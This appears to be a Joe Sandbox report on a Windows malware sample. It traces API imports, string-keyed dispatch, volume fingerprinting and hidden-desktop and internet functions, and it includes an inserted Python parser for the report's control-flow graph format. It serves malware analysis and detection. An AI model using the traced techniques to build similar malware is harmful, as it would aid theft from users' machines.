                          • GetProcAddress.KERNEL32(75A50000,012862E0), ref: 00646E16
                          • GetProcAddress.KERNEL32(75A50000,01298820), ref: 00646E2F
                          • GetProcAddress.KERNEL32(75A50000,0129CC08), ref: 00646E47
                          • GetProcAddress.KERNEL32(75A50000,0129CAA0), ref: 00646E5F
                          • GetProcAddress.KERNEL32(75A50000,01286380), ref: 00646E78
                          • GetProcAddress.KERNEL32(75A50000,012864E0), ref: 00646E90
                          • GetProcAddress.KERNEL32(75A50000,0129CB60), ref: 00646EA8
                          • GetProcAddress.KERNEL32(75A50000,0129CB78), ref: 00646EC1
                          • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00646ED7
                          • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00646EEE
                          • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00646F05
                          • GetProcAddress.KERNEL32(75070000,012865A0), ref: 00646F21
                          • GetProcAddress.KERNEL32(75070000,0129C938), ref: 00646F39
                          • GetProcAddress.KERNEL32(75070000,0129C950), ref: 00646F52
                          • GetProcAddress.KERNEL32(75070000,0129C968), ref: 00646F6A
                          • GetProcAddress.KERNEL32(75070000,0129C998), ref: 00646F82
                          • GetProcAddress.KERNEL32(74E50000,012863A0), ref: 00646F9E
                          • GetProcAddress.KERNEL32(74E50000,012865E0), ref: 00646FB6
                          • GetProcAddress.KERNEL32(75320000,01286400), ref: 00646FD2
                          • GetProcAddress.KERNEL32(75320000,0129CC80), ref: 00646FEA
                          • GetProcAddress.KERNEL32(6F490000,01286280), ref: 0064700A
                          • GetProcAddress.KERNEL32(6F490000,01286600), ref: 00647022
                          • GetProcAddress.KERNEL32(6F490000,012863C0), ref: 0064703B
                          • GetProcAddress.KERNEL32(6F490000,0129CC68), ref: 00647053
                          • GetProcAddress.KERNEL32(6F490000,01286420), ref: 0064706B
                          • GetProcAddress.KERNEL32(6F490000,01286440), ref: 00647084
                          • GetProcAddress.KERNEL32(6F490000,012862A0), ref: 0064709C
                          • GetProcAddress.KERNEL32(6F490000,01286460), ref: 006470B4
                          • GetProcAddress.KERNEL32(6F490000,InternetSetOptionA), ref: 006470CB
                          • GetProcAddress.KERNEL32(6F490000,HttpQueryInfoA), ref: 006470E2
                          • GetProcAddress.KERNEL32(74E00000,0129CDD0), ref: 006470FE
                          • GetProcAddress.KERNEL32(74E00000,01298960), ref: 00647116
                          • GetProcAddress.KERNEL32(74E00000,0129CDE8), ref: 0064712F
                          • GetProcAddress.KERNEL32(74E00000,0129CCC8), ref: 00647147
                          • GetProcAddress.KERNEL32(74DF0000,01286640), ref: 00647163
                          • GetProcAddress.KERNEL32(6E540000,0129CD10), ref: 0064717F
                          • GetProcAddress.KERNEL32(6E540000,01286500), ref: 00647197
                          • GetProcAddress.KERNEL32(6E540000,0129CC20), ref: 006471B0
                          • GetProcAddress.KERNEL32(6E540000,0129CE78), ref: 006471C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 8f51dc6749f3f47d9fa0438c68e20083887daebdc4765003369bffbc08b1e466
                          • Instruction ID: 04f2d745a2edb0fe815deb54ec43ec0a02939a47fb0fb2da0dc5a8d50c888a87
                          • Opcode Fuzzy Hash: 8f51dc6749f3f47d9fa0438c68e20083887daebdc4765003369bffbc08b1e466
                          • Instruction Fuzzy Hash: 0D6210B5511B00DFD754DF64EC89A263BBAF78C643310891AE996D33A4EB3CA840DF61
                          APIs
                          • lstrlen.KERNEL32(0064CFEC), ref: 0063F1D5
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F1F1
                          • lstrlen.KERNEL32(0064CFEC), ref: 0063F1FC
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F215
                          • lstrlen.KERNEL32(0064CFEC), ref: 0063F220
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F239
                          • lstrcpy.KERNEL32(00000000,00654FA0), ref: 0063F25E
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F28C
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F2C0
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063F2F0
                          • lstrlen.KERNEL32(01286880), ref: 0063F315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 3f0f6551145e9e2f450efc62f25f82f6b60d1efc4dcab2db9fed208dcfcbb9c6
                          • Instruction ID: fdfab9c09116531df6bb9337cf15664758b1b4d7da74fe51ca0c703b7b90cc77
                          • Opcode Fuzzy Hash: 3f0f6551145e9e2f450efc62f25f82f6b60d1efc4dcab2db9fed208dcfcbb9c6
                          • Instruction Fuzzy Hash: 35A24870D01616DFCB60DF65D848A9ABBF6BF44315F188079E8499B362EB39DC42CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640013
                          • lstrlen.KERNEL32(0064CFEC), ref: 006400BD
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006400E1
                          • lstrlen.KERNEL32(0064CFEC), ref: 006400EC
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640110
                          • lstrlen.KERNEL32(0064CFEC), ref: 0064011B
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0064013F
                          • lstrlen.KERNEL32(0064CFEC), ref: 0064015A
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640189
                          • lstrlen.KERNEL32(0064CFEC), ref: 00640194
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006401C3
                          • lstrlen.KERNEL32(0064CFEC), ref: 006401CE
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640206
                          • lstrlen.KERNEL32(0064CFEC), ref: 00640250
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00640288
                          • lstrcpy.KERNEL32(00000000,?), ref: 0064059B
                          • lstrlen.KERNEL32(01286840), ref: 006405AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 006405D7
                          • lstrcat.KERNEL32(00000000,?), ref: 006405E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0064060E
                          • lstrlen.KERNEL32(0129DEB8), ref: 00640625
                          • lstrcpy.KERNEL32(00000000,?), ref: 0064064C
                          • lstrcat.KERNEL32(00000000,?), ref: 00640658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00640681
                          • lstrlen.KERNEL32(01286760), ref: 00640698
                          • lstrcpy.KERNEL32(00000000,?), ref: 006406C9
                          • lstrcat.KERNEL32(00000000,?), ref: 006406D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00640706
                          • lstrcpy.KERNEL32(00000000,012988D0), ref: 0064074B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0064077F
                          • lstrcpy.KERNEL32(00000000,0129DCC0), ref: 006407E7
                          • lstrcpy.KERNEL32(00000000,01298A20), ref: 00640858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 006408CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00640928
                          • lstrcpy.KERNEL32(00000000,01298B40), ref: 006409F8
                            • Part of subcall function 006224E0: lstrcpy.KERNEL32(00000000,?), ref: 00622528
                            • Part of subcall function 006224E0: lstrcpy.KERNEL32(00000000,?), ref: 0062254E
                            • Part of subcall function 006224E0: lstrcpy.KERNEL32(00000000,?), ref: 00622577
                          • lstrcpy.KERNEL32(00000000,01298B90), ref: 00640ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00640B81
                          • lstrcpy.KERNEL32(00000000,01298B90), ref: 00640D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: da899da455b2c382fe0e7f33514ca8f5e46d111cc8dfa27ea129543fcaf3fda5
                          • Instruction ID: a93165c2543c0971184a336c5fc12918d215ea0e718c60a085ca5acff469fa6e
                          • Opcode Fuzzy Hash: da899da455b2c382fe0e7f33514ca8f5e46d111cc8dfa27ea129543fcaf3fda5
                          • Instruction Fuzzy Hash: 62E26970A053418FD764DF29C488B9ABBE2BF89304F58856EE58D8B352DB35D885CF42
                          APIs
                          • lstrlen.KERNEL32(01286880), ref: 0063F315
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063F3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063F47B
                          • lstrcpy.KERNEL32(00000000,01286880), ref: 0063F4BB
                          • lstrcpy.KERNEL32(00000000,012987F0), ref: 0063F4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063F59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0063F61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0063F718
                          • lstrlen.KERNEL32(01298900), ref: 0063F746
                          • lstrcpy.KERNEL32(00000000,01298900), ref: 0063F771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063F793
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063F7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 0063FA32
                          • lstrlen.KERNEL32(01298920), ref: 0063FA60
                          • lstrcpy.KERNEL32(00000000,01298920), ref: 0063FA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063FAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063FAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 5e504c110cda0a9efaaabe305455fda434fe73baeaf15697fd0bb35367452a0b
                          • Instruction ID: 8cac5ea8209d57c248558f31c291dca4b613e2775aa6dc333d0099cf102f761e
                          • Opcode Fuzzy Hash: 5e504c110cda0a9efaaabe305455fda434fe73baeaf15697fd0bb35367452a0b
                          • Instruction Fuzzy Hash: C4F11870E01712CFDB64CF29D854AA9B7E6BF44315F1980BAD4499B362DB3ADC42CB90

                           Control-flow Graph (flattened edge list of the rendered graph; legend of the rendering: Executed / Not Executed)
                           control_flow_graph 2721 638ca0-638cc4 StrCmpCA 2722 638cc6-638cc7 ExitProcess 2721->2722 2723 638ccd-638ce6 2721->2723 2725 638ee2-638eef call 622a20 2723->2725 2726 638cec-638cf1 2723->2726 2728 638cf6-638cf9 2726->2728 2729 638ec3-638edc 2728->2729 2730 638cff 2728->2730 2732 638d06-638d15 lstrlen 2730->2732 2733 638d84-638d92 StrCmpCA 2730->2733 2734 638da4-638db8 StrCmpCA 2730->2734 2735 638e88-638e9a lstrlen 2730->2735 2736 638e6f-638e7d StrCmpCA 2730->2736 2737 638d30-638d3f lstrlen 2730->2737 2738 638e56-638e64 StrCmpCA 2730->2738 2739 638d5a-638d69 lstrlen 2730->2739 2740 638dbd-638dcb StrCmpCA 2730->2740 2741 638ddd-638deb StrCmpCA 2730->2741 2742 638dfd-638e0b StrCmpCA 2730->2742 2743 638e1d-638e2b StrCmpCA 2730->2743 2744 638e3d-638e4b StrCmpCA 2730->2744 2753 638d17-638d1c call 622a20 2732->2753 2754 638d1f-638d2b call 622930 2732->2754 2733->2729 2748 638d98-638d9f 2733->2748 2734->2729 2758 638ea4-638eb0 call 622930 2735->2758 2759 638e9c-638ea1 call 622a20 2735->2759 2736->2729 2757 638e7f-638e86 2736->2757 2760 638d41-638d46 call 622a20 2737->2760 2761 638d49-638d55 call 622930 2737->2761 2738->2729 2756 638e66-638e6d 2738->2756 2745 638d73-638d7f call 622930 2739->2745 2746 638d6b-638d70 call 622a20 2739->2746 2740->2729 2749 638dd1-638dd8 2740->2749 2741->2729 2750 638df1-638df8 2741->2750 2742->2729 2751 638e11-638e18 2742->2751 2743->2729 2752 638e31-638e38 2743->2752 2744->2729 2755 638e4d-638e54 2744->2755 2779 638eb3-638eb5 2745->2779 2746->2745 2748->2729 2749->2729 2750->2729 2751->2729 2752->2729 2753->2754 2754->2779 2755->2729 2756->2729 2757->2729 2758->2779 2759->2758 2760->2761 2761->2779 2764->2728 2779->2729 2780 638eb7-638eb9 2779->2780 2780->2729 2781 638ebb-638ebd lstrcpy 2780->2781 2781->2729
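The graph line above is a flattened edge list: every basic block appears as a numeric id, an address range, and its API annotations (with "* N" for repeated calls and "call <addr>" for internal calls), followed by the edges leading into it. Read that way, block 2721 (638ca0-638cc4) performs a StrCmpCA and branches directly to block 2722, which calls ExitProcess, so a single string comparison decides whether the function continues or the process terminates; block 2730 then fans out into a dozen StrCmpCA blocks, the shape of a string-keyed dispatch. The Python below is an added example, not part of the Joe Sandbox report: it parses this graph format back into blocks and edges, lists the blocks calling a given API, and reports which comparison blocks directly gate ExitProcess. The two sample strings are truncated copies of this graph and of the resolver graph at 0x6466e0 shown earlier on the page.

```python
import re
from collections import Counter

# Truncated copies of two "control_flow_graph" lines from the report: the
# StrCmpCA/ExitProcess dispatcher at 0x638ca0 and the import resolver at
# 0x6466e0. The real lines continue well past what is kept here.
SAMPLE_DISPATCH = (
    "control_flow_graph 2721 638ca0-638cc4 StrCmpCA 2722 638cc6-638cc7 ExitProcess "
    "2721->2722 2723 638ccd-638ce6 2721->2723 2725 638ee2-638eef call 622a20 "
    "2723->2725 2726 638cec-638cf1 2723->2726 2728 638cf6-638cf9 2726->2728 "
    "2729 638ec3-638edc 2728->2729 2730 638cff 2728->2730 2732 638d06-638d15 "
    "lstrlen 2730->2732 2733 638d84-638d92 StrCmpCA 2730->2733"
)
SAMPLE_RESOLVER = (
    "control_flow_graph 633 6466e0-6466e7 634 6466ed-646af9 GetProcAddress * 43 "
    "633->634 635 646afe-646b92 LoadLibraryA * 8 633->635 634->635"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")
RANGE = re.compile(r"^[0-9a-f]{5,}(-[0-9a-f]{5,})?$")   # "638ca0-638cc4" or a lone "638cff"


def parse_cfg(text):
    """Rebuild basic blocks and edges from a flattened Joe Sandbox graph line."""
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    nodes, edges = {}, []
    cur, last_call = None, None
    i = 1
    while i < len(tokens):
        t = tokens[i]
        m = EDGE.match(t)
        if m:                                           # "a->b": edge into block b
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif t.isdigit() and i + 1 < len(tokens) and RANGE.match(tokens[i + 1]):
            cur = nodes[int(t)] = {"range": tokens[i + 1], "calls": Counter()}
            last_call = None
            i += 2
        elif cur is None:
            raise ValueError(f"annotation {t!r} before any block")
        elif t == "call" and i + 1 < len(tokens):       # "call 622a20": internal subroutine
            last_call = "call " + tokens[i + 1]
            cur["calls"][last_call] += 1
            i += 2
        elif t == "*" and last_call and i + 1 < len(tokens) and tokens[i + 1].isdigit():
            cur["calls"][last_call] += int(tokens[i + 1]) - 1   # "API * N": N calls in the block
            i += 2
        else:                                           # plain API name
            last_call = t
            cur["calls"][t] += 1
            i += 1
    return {"nodes": nodes, "edges": edges}


def blocks_calling(graph, api):
    """Ids of blocks whose annotations include the named API."""
    return sorted(b for b, n in graph["nodes"].items() if n["calls"].get(api))


def predecessors(graph, block):
    return sorted(src for src, dst in graph["edges"] if dst == block)


def exit_guards(graph):
    """(block, api names) for every block whose direct successor calls ExitProcess."""
    guards = []
    for exit_block in blocks_calling(graph, "ExitProcess"):
        for pred in predecessors(graph, exit_block):
            guards.append((pred, sorted(graph["nodes"][pred]["calls"])))
    return guards


if __name__ == "__main__":
    g = parse_cfg(SAMPLE_DISPATCH)
    print("StrCmpCA blocks:", blocks_calling(g, "StrCmpCA"))
    print("blocks gating ExitProcess:", exit_guards(g))
    g2 = parse_cfg(SAMPLE_RESOLVER)
    print("resolver block 634:", dict(g2["nodes"][634]["calls"]))
```

The parser relies on two properties of the format as it appears on this page: block ids are short decimal numbers followed by a hex range of at least five digits, and a "* N" multiplier always follows the API it repeats, so a count token is never mistaken for a block id.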
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: e988631c107ae57b84c553dad7257326f7e88e86aa2dc7756e9b8ba8b68e5af9
                          • Instruction ID: e61ccbff3cca24006296e4c8e05aea75d6f31cc21f828acdeb03fea555ba68aa
                          • Opcode Fuzzy Hash: e988631c107ae57b84c553dad7257326f7e88e86aa2dc7756e9b8ba8b68e5af9
                          • Instruction Fuzzy Hash: 07514A70D04B02EFC7209F65DCC5AABBAF6BB84705F10481DF482D3651DB78A5468BA1

                          Control-flow Graph

                          control_flow_graph 2782 642740-642783 GetWindowsDirectoryA 2783 642785 2782->2783 2784 64278c-6427ea GetVolumeInformationA 2782->2784 2783->2784 2785 6427ec-6427f2 2784->2785 2786 6427f4-642807 2785->2786 2787 642809-642820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 642826-642844 wsprintfA 2787->2788 2789 642822-642824 2787->2789 2790 64285b-642872 call 6471e0 2788->2790 2789->2790
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0064277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,006393B6,00000000,00000000,00000000,00000000), ref: 006427AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0064280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00642816
                          • wsprintfA.USER32 ref: 0064283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: 166298245a148f4693fa3eb40a68afc254ebe9de303511a4041d77ad4d0cd35b
                          • Instruction ID: bfb51078441d6a055a980362c6df4a138160c5ad810f777f06c4420ed298450a
                          • Opcode Fuzzy Hash: 166298245a148f4693fa3eb40a68afc254ebe9de303511a4041d77ad4d0cd35b
                          • Instruction Fuzzy Hash: CF316FB190820A9FCB04CFB88985AEFBFBDFF58711F10016AE505F7650E6348A408BA1

                          Control-flow Graph

                          control_flow_graph 2793 624bc0-624bce 2794 624bd0-624bd5 2793->2794 2794->2794 2795 624bd7-624c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 622a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00624BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00624C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00624C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 00624C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 00624C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 3d3910a797e71add2b4817ad80ca346a6c132255ff1f034980b39d64f320183d
                          • Instruction ID: b05cbe7be0b0e4b4f2d7aa28d3156f091f716ed22cf26f9a23fd17324a5f8897
                          • Opcode Fuzzy Hash: 3d3910a797e71add2b4817ad80ca346a6c132255ff1f034980b39d64f320183d
                          • Instruction Fuzzy Hash: 00012971D00218ABDB10DFA9EC45B9EBBB9EB08325F00812AF914E7390EF7499048FD4

                          Control-flow Graph

